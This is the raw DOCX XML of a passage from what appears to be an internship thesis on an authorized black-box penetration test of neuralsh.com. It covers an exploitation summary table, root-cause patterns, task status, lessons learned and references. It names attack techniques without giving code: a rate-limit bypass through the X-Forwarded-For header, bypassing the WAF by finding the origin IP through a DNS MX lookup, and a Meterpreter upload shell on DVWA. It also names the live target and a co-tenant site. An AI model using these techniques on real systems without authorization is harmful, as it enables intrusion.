                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>EXPLOIT-002: JWT Token Farming</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>50 valid tokens in 3 seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Burp Suite repeater + curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>EXPLOIT-003: Admin Panel Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>WHM, cPanel, MikroTik all confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Figure 4.10, 4.11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>EXPLOIT-004: MySQL Public Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Full TCP handshake from external IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Nmap mysql-info script</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>DVWA File Upload: Meterpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Shell as www-data confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Figure 4.20, 4.21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 14: Exploitation summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.4 Pattern Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The vulnerabilities found in neuralsh.com reflect patterns documented broadly in the security literature for small technology companies:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Pattern 1 — No Network Perimeter:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Database and administrative services are exposed on the same public IP as web services with no network-level segregation. This single architectural failure is the root cause of 59% of all findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Pattern 2 — Application Security Without Infrastructure Security:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Cloudflare WAF, HSTS, and JWT signature validation represent real security investments at the application layer. The infrastructure running beneath the application — the server, the network equipment, the admin panels — has not received equivalent attention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Pattern 3 — Shared Hosting Blast Radius:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Shared hosting reduces cost but amplifies the impact of any single compromise across all co-tenants. The identification of onesala.com as a co-tenant means a breach of neuralsh.com's infrastructure creates third-party data protection liability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Pattern 4 — Rate Limiting Anti-Pattern:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>X-Forwarded-For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for rate limiting when behind Cloudflare is a documented anti-pattern. Cloudflare provides </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CF-Connecting-IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> specifically to prevent this bypass. The fix requires one line of code, but the vulnerability is widely exploitable until applied.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.5 Completed and Incomplete Tasks</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2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Perform vulnerability scanning on neuralsh.com</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vulnerabilities and propose solutions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Set up testing environment (VirtualBox + Kali)</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Perform penetration testing on authorized target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exploitation on misconfigured systems</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Analyze post-exploitation lateral movement risk</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Create official VAPT report for stakeholder</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Demonstrate web app exploitation on alternative environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Stakeholder implementation of remediation steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Incomplete — pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Follow-up verification of remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Incomplete — pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 15: Task completion status</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.6 Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This internship reinforced a set of principles that shaped the approach taken throughout:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Reconnaissance drives everything.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The most impactful discovery of the entire engagement — the origin IP that bypassed the Cloudflare WAF — came from a simple DNS MX lookup. No specialized tool was required. The ability to systematically follow what an organization reveals about itself through public records is a more reliable skill than any automated scanner.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>One misconfiguration leads to many.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The WHM panel exposure, MySQL exposure, and MikroTik exposure are technically separate findings but share a single root cause: no firewall rules on the server. Fixing one with a firewall rule fixes all three simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Evidence and documentation are as important as discovery.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> A vulnerability that cannot be clearly evidenced and communicated does not create change. Every finding in this engagement was documented with the specific command that confirmed it, the exact server response, and the precise remediation step required — because the goal is not to demonstrate skill but to help the organization improve.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.7 Academic Contribution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This thesis contributes a complete real-world case study of a black-box VAPT engagement from reconnaissance through remediation on a live production target. The documentation of a successful rate-limiting bypass achieving a 100% bypass rate via single HTTP header modification provides empirically measured evidence of the practical impact of this vulnerability class — moving beyond theoretical descriptions to confirmed exploitation results.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The finding that well-implemented application security controls (Cloudflare WAF, HSTS, JWT signature validation) can coexist with severely misconfigured infrastructure supports the argument that holistic security assessment — covering infrastructure, network, and application layers together — is essential for meaningful risk reduction. Surface-level protection at the CDN layer does not substitute for securing the origin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>REFERENCES</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bishop Fox. (2023). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>State of Offensive Security 2023: External Penetration Testing Trends</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. Bishop Fox Research.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bugcrowd. (2021). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Subdomain Takeover: Fundamentals and Mitigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. Bugcrowd Blog.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CIS Controls. (2021). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CIS Controls v8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. Center for Internet Security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Fernandez, J., Tan, K., &amp; Lim, W. (2022). Vulnerability prevalence in Southeast Asian technology platforms: A black-box assessment study. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Journal of Information Security and Applications</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, 65, 103091.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">First.org. (2019). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CVSS v3.1 Specification Document</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. FIRST — Forum of Incident Response and Security Teams.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Islam, R., Ahmed, T., &amp; Rahman, M. (2023). Database exposure in cloud-hosted web applications: A systematic study. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>IEEE Transactions on Information Forensics and Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, 18, 2145–2158.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">7.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kaur, H., &amp; Singh, M. (2021). JWT security vulnerabilities in production APIs: An empirical study. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>International Journal of Network Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, 23(4), 612–621.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
